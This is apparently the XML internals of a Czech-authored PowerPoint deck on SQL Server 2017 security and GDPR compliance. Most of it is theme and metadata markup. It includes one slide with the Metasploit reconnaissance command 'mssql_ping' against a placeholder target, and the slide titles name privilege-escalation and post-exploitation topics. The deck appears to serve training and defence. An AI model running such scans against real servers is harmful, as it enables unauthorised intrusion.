            <a:r>
              <a:rPr lang="cs-CZ" sz="2133" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Target_IP_or_CIDR_identifier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2133" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170"/>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2133" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2133" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2133" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>auxiliary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2133" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2133" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mssql_ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2133" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) &gt; run</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="919374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rEXt8STxUy5UIXINzsJ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rEXt8STxUy5UIXINzsJ5Q"/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="C+E Readiness Template">
  <a:themeElements>
    <a:clrScheme name="Custom 4">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353535"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="353535"/>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2.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="1_C+E Readiness Template">
  <a:themeElements>
    <a:clrScheme name="Custom 3">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353535"/>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3.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="2_C+E Readiness Template">
  <a:themeElements>
    <a:clrScheme name="Custom 3">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353535"/>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4.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="3_C+E Readiness Template">
  <a:themeElements>
    <a:clrScheme name="Custom 4">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353535"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="353535"/>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5.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="COLOR TEMPLATE">
  <a:themeElements>
    <a:clrScheme name="BT - Blue">
      <a:dk1>
        <a:srgbClr val="505050"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="0078D7"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="CDF4FF"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="002050"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="D83B01"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="5C2D91"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="004B50"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="B4009E"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="32145A"/>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BLUE_2015_5.potx" id="{E0EC01A7-0783-40E0-B9B0-6DCAEA19C6EF}" vid="{9F5BD241-E952-4096-8B0E-507107CA6FB8}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme6.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="4_C+E Readiness Template">
  <a:themeElements>
    <a:clrScheme name="S4 Feb 2017 Dark Back">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FFF100"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="FFF100"/>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7.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office Theme">
  <a:themeElements>
    <a:clrScheme name="Gopas">
      <a:dk1>
        <a:srgbClr val="5C5C5C"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="3F3F3F"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FCFCFC"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="03326C"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="009FE3"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="EF7D00"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="009640"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="E50046"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="C8D4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B275CC9CB6594085DF0206766AEDCD" ma:contentTypeVersion="2" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="c4d06248d795888327f5898b35572bd4">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="49b0efef-6f4f-4cbd-b7c5-7eac4d65f4d4" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="c6255f64a97eca90d6408834008841dd" ns2:_="">
    <xsd:import namespace="49b0efef-6f4f-4cbd-b7c5-7eac4d65f4d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0efef-6f4f-4cbd-b7c5-7eac4d65f4d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959F10-8822-42C0-A358-FAB2FBE90E0B}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="49b0efef-6f4f-4cbd-b7c5-7eac4d65f4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D1A9DE-27A1-4D51-B251-3CEFA5DE97C1}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{7A75DEC7-A598-4B9A-8F90-BA8AA37459B6}">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terms/"/>
    <ds:schemaRef ds:uri="49b0efef-6f4f-4cbd-b7c5-7eac4d65f4d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4532</TotalTime>
  <Words>6131</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>763</Paragraphs>
  <Slides>52</Slides>
  <Notes>26</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2</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Slide Titles</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>52</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="72" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Lucida Console</vt:lpstr>
      <vt:lpstr>Segoe UI</vt:lpstr>
      <vt:lpstr>Segoe UI Light</vt:lpstr>
      <vt:lpstr>Segoe UI Semibold</vt:lpstr>
      <vt:lpstr>Segoe UI Semilight</vt:lpstr>
      <vt:lpstr>Signika Negative</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>C+E Readiness Template</vt:lpstr>
      <vt:lpstr>1_C+E Readiness Template</vt:lpstr>
      <vt:lpstr>2_C+E Readiness Template</vt:lpstr>
      <vt:lpstr>3_C+E Readiness Template</vt:lpstr>
      <vt:lpstr>COLOR TEMPLATE</vt:lpstr>
      <vt:lpstr>4_C+E Readiness Template</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>think-cell Slide</vt:lpstr>
      <vt:lpstr>CorelDRAW</vt:lpstr>
      <vt:lpstr>SQL Server 2017 Security and GDPR Compliance </vt:lpstr>
      <vt:lpstr>Objective and takeaways</vt:lpstr>
      <vt:lpstr>Security</vt:lpstr>
      <vt:lpstr>Data privacy today</vt:lpstr>
      <vt:lpstr>Security</vt:lpstr>
      <vt:lpstr>Enterprise Grade Security that is Easy-to Use</vt:lpstr>
      <vt:lpstr>MSSQL Server Fundamentals</vt:lpstr>
      <vt:lpstr>Fundamentals Contd.</vt:lpstr>
      <vt:lpstr>Locating &amp; Accessing SQL Servers </vt:lpstr>
      <vt:lpstr>Locating &amp; Accessing SQL Servers </vt:lpstr>
      <vt:lpstr>Local &amp; Domain SQL Perspective</vt:lpstr>
      <vt:lpstr>Escalating privileges within SQL Server</vt:lpstr>
      <vt:lpstr>Escalating privileges within SQL Server</vt:lpstr>
      <vt:lpstr>SQL Principals</vt:lpstr>
      <vt:lpstr>Escalating privileges within SQL Server</vt:lpstr>
      <vt:lpstr>Escalating privileges within SQL Server</vt:lpstr>
      <vt:lpstr>Weak Passwords &amp; Blind SQL Server Login Enumeration </vt:lpstr>
      <vt:lpstr>Weak Passwords &amp; Blind SQL Server Login Enumeration </vt:lpstr>
      <vt:lpstr>Impersonation</vt:lpstr>
      <vt:lpstr>Impersonate Privilege</vt:lpstr>
      <vt:lpstr>Stored Procedure and Trigger Creation / Injection Issues</vt:lpstr>
      <vt:lpstr>Stored Procedure and Trigger Creation / Injection Issues Contd.</vt:lpstr>
      <vt:lpstr>Escalating privileges within SQL Server</vt:lpstr>
      <vt:lpstr>OS Command Execution through SQL Server</vt:lpstr>
      <vt:lpstr>Indirect approach - Shared Service Accounts</vt:lpstr>
      <vt:lpstr>Indirect approach - Crawling Database Links</vt:lpstr>
      <vt:lpstr>Indirect approach - UNC Path Injection</vt:lpstr>
      <vt:lpstr>Escalating privileges wrapup</vt:lpstr>
      <vt:lpstr>Common post-exploitation activities</vt:lpstr>
      <vt:lpstr>Identifying Sensitive Data</vt:lpstr>
      <vt:lpstr>Extracting SQL Server Login password hashes</vt:lpstr>
      <vt:lpstr>Always Encrypted</vt:lpstr>
      <vt:lpstr>Protect your data at rest and in motion without affecting database performance</vt:lpstr>
      <vt:lpstr>Row-Level Security</vt:lpstr>
      <vt:lpstr>Configuring Row-Level Security</vt:lpstr>
      <vt:lpstr>Dynamic data masking</vt:lpstr>
      <vt:lpstr>Configure dynamic data masking</vt:lpstr>
      <vt:lpstr>SQL Server 2017 auditing</vt:lpstr>
      <vt:lpstr>SQL Server Audit</vt:lpstr>
      <vt:lpstr>Database Audit Specification </vt:lpstr>
      <vt:lpstr>Regulatory reaction</vt:lpstr>
      <vt:lpstr>Providing clarity and consistency for the protection of personal data</vt:lpstr>
      <vt:lpstr>What are the key changes with the GDPR?</vt:lpstr>
      <vt:lpstr>Data privacy–related requirements of the GDPR</vt:lpstr>
      <vt:lpstr>Applicability to the data tier</vt:lpstr>
      <vt:lpstr>Preparing for GDPR compliance </vt:lpstr>
      <vt:lpstr>How do I get started?</vt:lpstr>
      <vt:lpstr>Getting started—translated to SQL Server technologies</vt:lpstr>
      <vt:lpstr>Translated to SQL technologies...</vt:lpstr>
      <vt:lpstr>Translated to SQL technologies...</vt:lpstr>
      <vt:lpstr>Translated to SQL technologies...</vt:lpstr>
      <vt:lpstr>Translated to SQL technologies...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2017</dc:title>
  <dc:creator>Mike MacGregor</dc:creator>
  <cp:lastModifiedBy>Chmel, Marek</cp:lastModifiedBy>
  <cp:revision>24</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-08-20T08:28:39Z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0x010100F3B275CC9CB6594085DF0206766AEDCD</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markohot@microsoft.com</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="MSIP_Label_f42aa342-8706-4288-bd11-ebb85995028c_SetDate">
    <vt:lpwstr>2018-01-05T22:04:03.6584249Z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